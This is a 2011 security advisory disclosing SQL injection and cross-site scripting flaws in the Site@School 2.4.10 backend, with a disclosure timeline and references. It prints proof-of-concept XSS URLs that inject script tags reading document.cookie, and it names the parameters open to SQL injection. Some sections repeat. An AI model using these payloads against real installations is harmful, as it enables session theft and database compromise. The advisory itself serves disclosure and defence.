SSCHADV2011-030 - Site@School SQL Injection & XSS vulnerabilities
Advisory:
|
Site@School 2.4.10 SQL Injection & XSS vulnerabilities
|
Advisory ID:
|
SSCHADV2011-030
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on Site@School 2.4.10 |
Vendor URL:
|
|
Vendor Status:
|
insecure and no longer maintained
|
CVE-ID:
|
-
|
======================
Vulnerability Description:
======================
Vulnerability Description:
======================
Site@School is prone to multiple SQL Injection and XSS vulernabilities
==============
Technical Details:
==============
Backend – XSS
Technical Details:
==============
Backend – XSS
http://<target>/school/starnet/index.php?option=stats&suboption=’"</style></script><script>alert(document.cookie)</script>
http://<target>/school/starnet/index.php?option=pagemanager&suboption=newsection&site=’"</style></script><script>alert(document.cookie)</script>
http://<target>/school/starnet/index.php?option=modulemanager&modoption=edit&module_number="</style></script><script>alert(document.cookie)</script>
http://<target>/school/starnet/index.php?option=modulemanager&module=’"</style></script><script>alert(document.cookie)</script>
|
Backend – SQL Injection
http://<target>/school/starnet/index.php?option=modulemanager&modoption=edit&module_number=[sql injection] http://<target>/school/starnet/index.php?option=modulemanager&module=[sql injection] |
=====
Solution:
=====
Site@School: insecure and no longer maintained. Do’ not download it. Please use its successor: Website@School
================
Disclosure Timeline:
================
07-Oct-2011 – informed developers
08-Oct-2011 – response from vendor
18-Oct-2011 – release date of this security advisory
18-Oct-2011 – post on BugTraq
====
Credits:
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References:
=======
http://sourceforge.net/projects/siteatschool/
http://www.rul3z.de/advisories/SSCHADV2011-030.txt
====
Credits:
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References:
=======
http://sourceforge.net/projects/siteatschool/
http://www.rul3z.de/advisories/SSCHADV2011-030.txt
Comments
Display comments as Linear | Threaded